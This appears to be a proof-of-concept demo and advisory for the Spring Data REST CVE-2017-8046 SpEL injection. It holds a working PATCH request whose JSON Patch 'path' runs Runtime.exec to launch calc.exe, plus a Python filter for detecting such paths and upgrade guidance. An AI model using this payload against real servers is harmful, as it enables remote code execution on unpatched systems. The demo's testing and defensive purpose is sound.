SPRING DATA REST CVE-2017-8046 DEMO

Spring Data REST CVE-2017-8046 demo test

Please UPGRADE Spring Data REST NOW.

Steps

  • Start this application

  • Create a test instance

POST /entityPersons/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache

{
    "firstName":"f2"
}

  • Exploit the SpEL injection; this launches C:\Windows\system32\calc.exe

PATCH /entityPersons/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache

[
    {
        "op":"test",
        "path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[] {67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 115, 121, 115, 116, 101, 109, 51, 50, 92, 99, 97, 108, 99, 46, 101, 120, 101} ))",
        "value":""
    }
]
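
A defensive check for the PATCH request shown above, as an added example that is not part of the original demo: RFC 6902 requires every `path` (and `from`) in a JSON Patch document to be a JSON Pointer, so a gateway or log filter can flag bodies whose `path` is expression text instead. The function name `check_patch`, the token allow-list and the sample bodies are assumptions made for illustration.

```python
import json
import re

# RFC 6901 JSON Pointer: empty, or "/"-prefixed tokens where "~" only appears as "~0"/"~1".
JSON_POINTER = re.compile(r"(?:/(?:[^/~]|~[01])*)*")
# Assumption: legitimate tokens are property names, array indexes, or "-" (append).
SAFE_TOKEN = re.compile(r"[A-Za-z_][A-Za-z0-9_]*|\d+|-")
PATCH_TYPE = "application/json-patch+json"

def check_patch(content_type, body):
    """Return (op_index, field, reason) findings for a JSON Patch request body."""
    if content_type.split(";")[0].strip().lower() != PATCH_TYPE:
        return []  # not a JSON Patch request, nothing to inspect
    try:
        ops = json.loads(body)
    except ValueError:
        return [(-1, "body", "not valid JSON")]
    if not isinstance(ops, list):
        return [(-1, "body", "JSON Patch document must be an array")]
    findings = []
    for i, op in enumerate(ops):
        if not isinstance(op, dict):
            findings.append((i, "op", "operation is not an object"))
            continue
        for field in ("path", "from"):
            if field not in op:
                continue
            value = op[field]
            if not isinstance(value, str) or not JSON_POINTER.fullmatch(value):
                findings.append((i, field, "not a JSON Pointer"))
            elif not all(SAFE_TOKEN.fullmatch(t) for t in value.split("/")[1:]):
                findings.append((i, field, "token outside allow-list"))
    return findings

# Constructed sample bodies (not captured traffic).
SAMPLES = {
    "legitimate": '[{"op":"replace","path":"/firstName","value":"f3"}]',
    "expression": '[{"op":"test","path":"T(java.lang.String).valueOf(1)","value":""}]',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, check_patch(PATCH_TYPE, body))
```

A filter like this only narrows exposure on hosts that cannot be patched yet; upgrading Spring Data REST is the fix.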

Upgrade to

  • Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
  • Spring Boot 2.0.0.M4
  • Spring Data release train Kay-RC3

Spring Boot 1.5.7.RELEASE uses Spring Data REST 2.6.7, but Spring Boot 1.4.x has not upgraded its Spring Data REST version.